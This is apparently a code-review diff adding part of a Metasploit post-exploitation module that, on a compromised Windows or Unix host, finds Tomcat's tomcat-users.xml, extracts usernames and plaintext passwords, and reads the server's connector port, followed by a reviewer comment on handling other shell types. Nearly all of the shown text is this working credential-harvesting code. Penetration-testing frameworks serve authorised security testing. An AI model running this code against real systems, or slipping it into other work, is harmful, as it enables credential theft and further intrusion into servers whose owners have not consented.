modules/post/multi/gather/tomcat_gather.rb

```diff
@@ -0,0 +1,166 @@
+    service_list.each do |service|
+      if service[:name].downcase().include? "tomcat"
+        print_good("Tomcat service found")
+        tomcat_home = service_info(service[:name])[:path].split("\\bin\\")[0]
+        conf_path = tomcat_home.split('"')[1] + "\\conf\\tomcat-users.xml"
+
+        if exist?(conf_path)
+          print_status("tomcat-users.xml found")
+          xml = read_file(conf_path).split("\n")
+
+          comment_block = false
+          xml.each do |line|
+            if line.include? "<user username=" and not comment_block
+              $username.push(line.split('<user username="')[1].split('"')[0])
+              $password.push(line.split('password="')[1].split('"')[0])
+            elsif line.include? ("<!--")
+              comment_block = true
+            elsif line.include? ("-->") and comment_block
+              comment_block = false
+            end
+          end
+        end
+
+        port_path = tomcat_home.split('"')[1] + "\\conf\\server.xml"
+        if exist?(port_path)
+          xml = read_file(port_path).split("\n")
+        end
+        comment_block = false
+        xml.each do |line|
+          if line.include? "<Connector" and not comment_block
+            $port = line.split('<Connector port="')[1].split('"')[0].to_i
+          elsif line.include? ("<!--")
+            comment_block = true
+          elsif line.include? ("-->") and comment_block
+            comment_block = false
+          end
+        end
+      end
+    end
+  end
+
+  def gathernix()
+    print_status("Unix OS detected")
+    user_files = cmd_exec('locate tomcat-users.xml').split("\n")
+    user_files.each do |path|
+      if exist?(path) and not path.include? "tomcat8"
+          print_status("tomcat-users.xml found")
+          xml = read_file(path).split("\n")
+
+          comment_block = false
+          xml.each do |line|
+            if line.include? "<user username=" and not comment_block
+              $username.push(line.split('<user username="')[1].split('"')[0])
+              $password.push(line.split('password="')[1].split('"')[0])
+            elsif line.include? ("<!--")
+              comment_block = true
+            elsif line.include? ("-->") and comment_block
+              comment_block = false
+            end
+          end
+        end
+    end
+
+    port_path = cmd_exec('locate server.xml').split("\n")
+    port_path.each do |path|
+      if exist?(path)
+          xml = read_file(path).split("\n")
+          comment_block = false
+          xml.each do |line|
+            if line.include? "<Connector" and not comment_block
+              $port = line.split('<Connector port="')[1].split('"')[0].to_i
+            elsif line.include? ("<!--")
+              comment_block = true
+            elsif line.include? ("-->") and comment_block
+              comment_block = false
+            end
+          end
+      end
+    end
+  end
+
+  def run()
+    if sysinfo['OS'].include? "Windows"
```

Comment:
still need a default case here, just in case.  maybe try both win and nix?  or error out and demand mettle/meterpreter assuming its a standard shell